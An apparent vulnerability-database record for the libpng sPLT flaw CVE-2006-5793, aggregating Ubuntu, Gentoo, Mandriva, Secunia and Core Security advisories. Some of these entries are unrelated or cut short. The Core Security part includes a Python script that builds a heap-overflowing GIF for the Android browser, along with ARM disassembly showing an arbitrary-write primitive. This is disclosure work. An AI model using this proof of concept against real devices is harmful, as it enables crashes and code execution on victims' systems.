var-200611-0210
Vulnerability from variot
The sPLT chunk handling code (png_set_sPLT function in pngset.c) in libpng 1.0.6 through 1.2.12 uses a sizeof operator on the wrong data type, which allows context-dependent attackers to cause a denial of service (crash) via malformed sPLT chunks that trigger an out-of-bounds read. PNG (Portable Network Graphics) Format image processing library libpng In png_set_sPLT() In the function sPLT In the chunk processing code section, PNG There is a problem that memory access violation occurs due to image processing.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) May be in a state. The 'libpng' graphics library is reported prone to a denial-of-service vulnerability. The library fails to perform proper bounds-checking of user-supplied input, which leads to an out-of-bounds read error. Attackers may exploit this vulnerability to crash an application that relies on the affected library. =========================================================== Ubuntu Security Notice USN-383-1 November 16, 2006 libpng vulnerability CVE-2006-5793 ===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10
This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 5.10: libpng10-0 1.0.18-1ubuntu3.1
Ubuntu 6.06 LTS: libpng12-0 1.2.8rel-5ubuntu0.1
Ubuntu 6.10: libpng12-0 1.2.8rel-5.1ubuntu0.1
After a standard system upgrade you need to reboot your computer to effect the necessary changes.
Details follow:
Tavis Ormandy discovered that libpng did not correctly calculate the size of sPLT structures when reading an image.
Updated packages for Ubuntu 5.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18-1ubuntu3.1.diff.gz
Size/MD5: 12960 3ae9ff536ba163efc00070487687399b
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18-1ubuntu3.1.dsc
Size/MD5: 636 3af55a46b4ada05160527a49c5dd6671
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18.orig.tar.gz
Size/MD5: 506181 40081bdc82e4c6cf782553cd5aa8d9d8
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng2-dev_1.0.18-1ubuntu3.1_all.deb
Size/MD5: 1166 160ce752a119a735d2abf03ec1f1dd55
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng2_1.0.18-1ubuntu3.1_all.deb
Size/MD5: 942 e3c40272cd978953acf3469dbda42a30
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_amd64.deb
Size/MD5: 113890 e395ef9909e34cc4333fb868a7a794f2
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_amd64.deb
Size/MD5: 197710 1b46e5c7e431d6640e319ca81f0634ad
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_i386.deb
Size/MD5: 109224 e083cb785e2bc0225b47fee51c69b22b
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_i386.deb
Size/MD5: 186536 476d8276b05d075552fc878547a17092
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_powerpc.deb
Size/MD5: 111444 cda22be3ef3d978e4aa3c7111c7f7436
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_powerpc.deb
Size/MD5: 196744 db0ae3294f47addab0ff52b4d134fff8
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_sparc.deb
Size/MD5: 109078 26672912dc8d37ae7afbc57fba8cc477
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_sparc.deb
Size/MD5: 192902 458ef029777b12b5b4165e63d097c774
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.1.diff.gz
Size/MD5: 16308 c13ba4eb92c046153c73cec343ba0dad
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.1.dsc
Size/MD5: 652 ec80abc5bbe3fb9593374a6df3e5351d
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.1_all.deb
Size/MD5: 842 db0b015e80f042a3311152aad1a1f96f
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_amd64.udeb
Size/MD5: 69468 8c741fd0d0ff83068e6dd78bc2e026c1
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_amd64.deb
Size/MD5: 113808 c86b5b27effab5f974f4f2c4ce743515
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_amd64.deb
Size/MD5: 247500 6493fda0d94d75f2255cb48399fa5fec
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_i386.udeb
Size/MD5: 66918 38259ac6fd9f0b4fc56e59b9b8fa75e4
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_i386.deb
Size/MD5: 111304 440e23028cc1c9de3fb459f8969641d5
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_i386.deb
Size/MD5: 239650 0235a7988ea235573758fd45a7500cf9
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_powerpc.udeb
Size/MD5: 66284 ba2f362738e47667364a69a7425a4bae
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_powerpc.deb
Size/MD5: 110738 27426cfb75acb15305d71a26d79ecf70
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_powerpc.deb
Size/MD5: 245228 297d5a07d22ea0c2deb1e3a2da22cc7d
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_sparc.udeb
Size/MD5: 63820 b28e9240844c87f288986efcfaa6d82b
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_sparc.deb
Size/MD5: 108438 439feb51a430e75b0314ebd0bbe9eeaf
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_sparc.deb
Size/MD5: 240068 f1d19c0623d6a875c240ae809f39cc37
Updated packages for Ubuntu 6.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.1.diff.gz
Size/MD5: 16419 341fce97b60457776d7d5b3045e98ab8
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.1.dsc
Size/MD5: 659 128223fd1ee1485c1edda30965e2c638
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.1_all.deb
Size/MD5: 884 ff80da62782949d9ee6e2f45de7368d8
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_amd64.udeb
Size/MD5: 68974 410bb02f1680b74c0b7bdfe75b6d4f6c
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_amd64.deb
Size/MD5: 113470 595b09232667d5f45bfc94cbac2154e4
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_amd64.deb
Size/MD5: 247126 af29f417517106cf651dab5c92ad52ee
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_i386.udeb
Size/MD5: 69914 d335eae45c97a06251e2b1bb263a0f78
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_i386.deb
Size/MD5: 114466 eb4ebc44ac004eddd4ac551f443d9196
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_i386.deb
Size/MD5: 242864 a79b348098a3e5051a93dcc3bfc44f80
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_powerpc.udeb
Size/MD5: 67592 c11829d98adc0dd16883d1b00c773691
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_powerpc.deb
Size/MD5: 112146 e95acde5a5756fe1e8ae3085e160a437
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_powerpc.deb
Size/MD5: 246662 eea28613a44952b49f1ebd1c9365c31e
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_sparc.udeb
Size/MD5: 64644 0a019f09ea70eb9e0734542116919875
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_sparc.deb
Size/MD5: 109320 c8c61d5fc9db2c8edf9ca933bc0aeea6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_sparc.deb
Size/MD5: 241060 a4d7a38de962236150bbbb84be9c542f
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-09
http://security.gentoo.org/
Severity: Normal Title: libpng: Denial of Service Date: November 17, 2006 Bugs: #154380 ID: 200611-09
Synopsis
A vulnerability in libpng may allow a remote attacker to crash applications that handle untrusted images.
Background
libpng is a free ANSI C library used to process and manipulate PNG images.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/libpng < 1.2.13 >= 1.2.13
Description
Tavis Ormandy of the Gentoo Linux Security Audit Team discovered that a vulnerability exists in the sPLT chunk handling code of libpng, a large sPLT chunk may cause an application to attempt to read out of bounds.
Impact
A remote attacker could craft an image that when processed or viewed by an application using libpng causes the application to terminate abnormally.
Workaround
There is no known workaround at this time.
Resolution
All libpng users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libpng-1.2.13"
References
[ 1 ] CVE-2006-5793 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200611-09.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.
License
Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . ----------------------------------------------------------------------
Do you need accurate and reliable IDS / IPS / AV detection rules?
Get in-depth vulnerability details: http://secunia.com/binary_analysis/sample_analysis/
TITLE: FUJITSU Interstage Products Apache Tomcat Security Bypass
SECUNIA ADVISORY ID: SA32234
VERIFY ADVISORY: http://secunia.com/advisories/32234/
CRITICAL: Not critical
IMPACT: Security Bypass
WHERE:
From remote
SOFTWARE: Interstage Application Server 6.x http://secunia.com/advisories/product/13693/ Interstage Application Server 7.x http://secunia.com/advisories/product/13692/ Interstage Application Server 8.x http://secunia.com/advisories/product/13685/ Interstage Application Server 9.x http://secunia.com/advisories/product/15986/ Interstage Apworks 6.x http://secunia.com/advisories/product/13688/ Interstage Apworks 7.x http://secunia.com/advisories/product/13689/ Interstage Studio 8.x http://secunia.com/advisories/product/13690/ Interstage Studio 9.x http://secunia.com/advisories/product/15610/ Interstage Business Application Server 8.x http://secunia.com/advisories/product/13687/ Interstage Job Workload Server 8.x http://secunia.com/advisories/product/13686/
DESCRIPTION: A security issue has been reported in various FUJITSU Interstage products, which potentially can be exploited by malicious people to bypass certain security restrictions.
The security issue is caused due to a synchronisation problem when checking IP addresses and can be exploited to bypass a filter valve that extends "RemoteFilterValve" and potentially gain access to protected contexts.
SOLUTION: Patches are scheduled for release.
Use a proxy or firewall to protect resources.
PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY: FUJITSU: http://www.fujitsu.com/global/support/software/security/products-f/interstage-200806e.html
JVN: http://jvn.jp/en/jp/JVN30732239/index.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDKSA-2006:212 http://www.mandriva.com/security/
Package : doxygen Date : November 16, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
Problem Description:
Doxygen is a documentation system for C, C++ and IDL. (CVE-2006-3334)
It is questionable whether this issue is actually exploitable, but the patch to correct the issue has been included in versions < 1.2.12. (CVE-2006-5793)
In addition, an patch to address several old vulnerabilities has been applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, CAN-2004-0598, CAN-2004-0599)
Packages have been patched to correct these issues.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793
Updated Packages:
Mandriva Linux 2006.0: f85fd4b73ca06136e4346df073851e5f 2006.0/i586/doxygen-1.4.4-1.1.20060mdk.i586.rpm 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm
Mandriva Linux 2006.0/X86_64: fc3e569bd8ad2aa9aea76a6f4246cfec 2006.0/x86_64/doxygen-1.4.4-1.1.20060mdk.x86_64.rpm 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm
Mandriva Linux 2007.0: 9d0af28627560057e6c80e64bbacf030 2007.0/i586/doxygen-1.4.7-1.1mdv2007.0.i586.rpm f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm
Mandriva Linux 2007.0/X86_64: 7fca6ebbe6f07e51de7fd771678277b4 2007.0/x86_64/doxygen-1.4.7-1.1mdv2007.0.x86_64.rpm f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm
Corporate 3.0: 9452cede2d92671808eebe1adfc395ef corporate/3.0/i586/doxygen-1.3.5-2.1.C30mdk.i586.rpm 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm
Corporate 3.0/X86_64: d988dc94c39515b3855116709bcc84de corporate/3.0/x86_64/doxygen-1.3.5-2.1.C30mdk.x86_64.rpm 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm
Corporate 4.0: a3b4702c81d1739249d59782efb316dc corporate/4.0/i586/doxygen-1.4.4-1.1.20060mlcs4.i586.rpm 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm
Corporate 4.0/X86_64: 0568b10460c651f18fd3e2a8e76b4300 corporate/4.0/x86_64/doxygen-1.4.4-1.1.20060mlcs4.x86_64.rpm 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFFXMIpmqjQ0CJFipgRAnt1AJ9NuzEsIC9PzHE278eZAhOPHjMh8QCePD/Q pK8OJ2vhx3DqZ400EPH5QMw= =R8Jo -----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
Advisory Information
Title: Multiple vulnerabilities in Google's Android SDK Advisory ID: CORE-2008-0124 Advisory URL: http://www.coresecurity.com/?action=item&id=2148 Date published: 2008-03-04 Date of last update: 2008-03-04 Vendors contacted: Google Release mode: Coordinated release
Vulnerability Information
Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269
Vulnerability Description
Android is project promoted primarily by Google through the Open Handset Alliance aimed at providing a complete set of software for mobile devices: an operating system, middleware and key mobile applications [1]. Although the project is currently in a development phase and has not made an official release yet, several vendors of mobile chips have unveiled prototype phones built using development releases of the platform at the Mobile World Congress [2]. Development using the Android platform gained activity early in 2008 as a result of Google's launch of the Android Development Challenge which includes $10 million USD in awards [3] for which a Software Development Kit (SDK) was made available in November 2007.
The Android Software Development Kit includes a fully functional operating system, a set of core libraries, application development frameworks, a virtual machine for executing application and a phone emulator based on the QEMU emulator [4]. Public reports as of February 27th, 2008 state that the Android SDK has been downloaded 750,000 times since November 2007 [5].
Several vulnerabilities have been found in Android's core libraries for processing graphic content in some of the most used image formats (PNG, GIF an BMP). While some of these vulnerabilities stem from the use of outdated and vulnerable open source image processing libraries other were introduced by native Android code that use them or that implements new functionality.
Exploitation of these vulnerabilities to yield complete control of a phone running the Android platform has been proved possible using the emulator included in the SDK, which emulates phone running the Android platform on an ARM microprocessor.
This advisory contains technical descriptions of these security bugs, including a proof of concept exploit to run arbitrary code, proving the possibility of running code on Android stack (over an ARM architecture) via a binary exploit.
Vulnerable Packages
. Android SDK m3-rc37a and earlier are vulnerable several bugs in components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of this advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component that process BMP images (bug #3).
Non-vulnerable Packages
. Android SDK m5-rc15
Vendor Information, Solutions and Workarounds
Vendor statement:
"The current version of the Android SDK is an early look release to the open source community, provided so that developers can begin working with the platform to inform and shape our development of Android toward production readiness. The Open Handset Alliance welcomes input from the security community throughout this process. There will be many changes and updates to the platform before Android is ready for end users, including a full security review."
Credits
These vulnerabilities were discovered by Alfredo Ortega from Core Security Technologies, leading his Bugweek 2007 team called "Pampa Grande". It was researched in depth by Alfredo Ortega.
Technical Description / Proof of Concept Code
Android is a software stack for mobile devices that includes an operating system, middleware and key applications. Android relies on Linux version 2.6 for core system services such as security, memory management, process management, network stack, and driver model. The kernel also acts as an abstraction layer between the hardware and the rest of the software stack.
The WebKit application framework is included to facilitate development of web client application functionality. The framework in turn uses different third-party open source libraries to implement processing of several image formats.
Android includes a web browser based on the Webkit framework that contains multiple binary vulnerabilities when processing .GIF, .PNG and .BMP image files, allowing malicious client-side attacks on the web browser. A client-side attack could be launched from a malicious web site, hosting specially crafted content, with the possibility of executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the Android SDK that includes an ARM architecture emulator. Binary vulnerabilities are the most common security bugs in computer software. Basic bibliography on these vulnerabilities includes a recently updated handbook about security holes that also describes current state-of-the-start exploitation techniques for different hardware platforms and operating systems [6].
The vulnerabilities discovered are summarized below grouped by the type of image file format that is parsed by the vulnerable component.
#1 - GIF image parsing heap overflow
The Graphics Interchange Format (GIF) is image format dating at least from 1989 [7]. It was popularized because GIF images can be compressed using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the memory footprint and bandwidth required for transmission and storage.
A memory corruption condition happens within the GIF processing library of the WebKit framework when the function 'GIFImageDecoder::onDecode()' allocates a heap buffer based on the Logical Screen Width and Height filed of the GIF header (offsets 6 and 8) and then the resulting buffer is filled in with an amount of data bytes that is calculated based on the real Width and Height of the GIF image. There is a similar (if not the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the open-source version included by Android in 'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp' inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].
Detailed analysis:
When the process 'com.google.android.browser' must handle content with a GIF file it loads a dynamic library called 'libsgl.so' which contains the decoders for multiple image file formats.
Decoding of the GIF image is performed correctly by the library giflib 4.0 (compiled inside 'libsgl.so'). However, the wrapper object 'GIFImageDecoder' miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following calling sequence (As giflib is an Open Source MIT-licenced library, the source was available for analysis): 'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last function, 'DGifGetScreenDesc()', stores the Logical Screen Width and Height in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) { ... / Put the screen descriptor into the file: / if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR || DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR) return GIF_ERROR; ... } - -----------/
We can see that the fields are stored in the first 2 words of the structure:
/-----------
typedef struct GifFileType { / Screen dimensions. / GifWord SWidth, SHeight, ... } - -----------/
In the disassembly of the GIFImageDecoder::onDecode() function provided below we can see how the DGifOpen() function is called and that the return value (A GifFileType struct) is stored on the $R5 ARM register:
/-----------
.text:0002F234 BL DGifOpen .text:0002F238 SUBS R5, R0, #0 ; GifFile - $R5 - -----------/
Then, the giflib function 'DGifSlurp()' is called and the Image size is correctly allocated using the Image Width and Height and not the Logical Screen Size:
/-----------
Int DGifSlurp(GifFileType * GifFile) { ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height; sp->RasterBits = (unsigned char *)malloc(ImageSize * sizeof(GifPixelType)); ... } - -----------/
Afterwards the Logical Screen Width and Height are stored in the R9 and R11 registers:
/-----------
.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight ! - -----------/
However the actual image may be much larger that these sizes that are incorrectly passed to a number of methods of the 'GIFImageDecoder':
/-----------
ImageDecoder::chooseFromOneChoice(): .text:0002F294 MOV R0, R8 .text:0002F298 MOV R1, #3 .text:0002F29C MOV R2, R9 .text:0002F2A0 MOV R3, R11 .text:0002F2A4 STR R12, [SP,#0x48+var_3C] .text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice; ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int ,int)
Bitmap::setConfig(): .text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap .text:0002F2BC MOV R1, #3 .text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight ! .text:0002F2C4 MOV R3, R11 .text:0002F2C8 STR R10, [SP,#0x48+var_48] .text:0002F2CC BL _Bitmap9setConfig ; Bitmap::setConfig(SkBitmap::Config,uint,uint,uint) - -----------/
This function stores the SWidth and SHeight inside the Bitmap object as shown in the following code snippet:
/-----------
.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7 .text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8 .text:00035C40 MOV R4, R0 ; $R4 = *Bitmap - -----------/
And later:
/-----------
.text:00035C58 BL _Bitmap15ComputeRowBytes ; SkBitmap::ComputeRowBytes(SkBitmap::Config,uint) .text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes .text:00035C68 STRH R7, [R4,#0x18] ; Bitmap+0x18 = SWidth .text:00035C6C STRH R8, [R4,#0x1A] ; Bitmap+0x1A = SHeight .text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes - -----------/
The following python script generates a GIF file that causes the overflow. It requires the Python Imaging Library. Once generated the GIF file, it must be opened in the Android browser to trigger the overflow:
/-----------
Android Heap Overflow
Ortega Alfredo _ Core Security Exploit Writers Team
tested against Android SDK m3-rc37a
import Image import struct
Creates a good gif image
imagename='overflow.gif' str = '\x00\x00\x00\x00'*30000 im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1) im.save(imagename,'GIF')
Shrink the Logical screen dimension
SWidth=1 SHeight=1
img = open(imagename,'rb').read() img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
Save the bad gif image
q=open(imagename,'wb=""') q.write(img) q.close() - -----------/
This security bug affects Android SDK m3-rc37a and earlier versions. Version m5-rc14 of the Android SDK includes a fix and is not vulnerable to this bug.
#2 - PNG image parsing, multiple vulnerabilities:
The Portable Network Graphics (PNG) is a bitmapped image format that employs lossless data compression [9]. PNG was created to improve upon and replace the GIF format as an image file format that does not require a patent license.
The library 'libsgl.so' used by Android's WebKit contains commonly used code to load graphic files, as libpng, giflib and others. The version inside libsgl.so distributed with Android SDK m3-rc37a and earlier versions include the string '"libpng version 1.2.8 - December 3, 2004"'. Source code inspection of the file '\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android project reveals that '"libpng version 1.2.7 - September 12, 2004"' has been used in this release.
This old version of libpng makes Android SDK m3-rc37a and earlier versions vulnerable to the following known issues: ' CVE-2006-5793, CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269 '.
Android version m5-rc14 has been updated to include libpng 1.2.24 and is likely not vulnerable.
#3 - BMP image processing, negative offset integer overflow:
The BMP file format, sometimes called bitmap or DIB file format (for device-independent bitmap), is an image file format used to store bitmap digital images, especially on Microsoft Windows and OS/2 operating systems [10].
The integer overflow is caused when a Windows Bitmap file (.BMP) header is parsed in the method 'BMP::readFromStream(Stream *, ImageDecoder::Mode)' inside the 'libsgl.so' library. When the value of the 'offset' field of the BMP file header is negative and the Bitmap Information section (DIB header) specifies an image of 8 bits per pixel (8 bpp) the parser will try to allocate a palette, and will use the negative offset to calculate the size of the palette.
The following code initializes the palette with the color white ('0x00ffffff') but with a carefully chosen negative offset it can be made to overwrite any address of the process with that value. Because the BMP decoder source wasn't released, a disassembly of the binary included by Android is provided below:
/-----------
.text:0002EE38 MOV LR, R7 ; R7 is the negative offset .text:0002EE3C MOV R12, R7,LSL#2 .text:0002EE40 .text:0002EE40 loc_2EE40 .text:0002EE40 LDR R3, [R10,#0x10] .text:0002EE44 ADD LR, LR, #1 .text:0002EE48 MOVL R2, 0xFFFFFFFF .text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the same bug) but ranges 0x10000-0x20000 .text:0002EE50 MOV R0, #0 .text:0002EE54 CMP LR, R9 .text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1) .text:0002EE5C STRB R2, [R1,#2] .text:0002EE60 STRB R0, [R1,#3] .text:0002EE64 STRB R2, [R1,#1] .text:0002EE68 ADD R12, R12, #4 .text:0002EE6C BNE loc_2EE40 - -----------/
Now, if let's take a look at the memory map of the Android browser:
/-----------
ps
ps USER PID PPID VSIZE RSS WCHAN PC NAME root 1 0 248 64 c0084edc 0000ae2c S /init root 2 0 0 0 c0049168 00000000 S kthreadd ... root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb app_0 1574 535 83564 12832 ffffffff afe0c79c S com.google.android.browser root 1600 587 840 324 00000000 afe0bfbc R ps
cat /proc/1574/maps
cat /proc/1574/maps 00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process 0000a000-00c73000 rwxp 0000a000 00:00 0 [heap] 08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted) ...
- -----------/
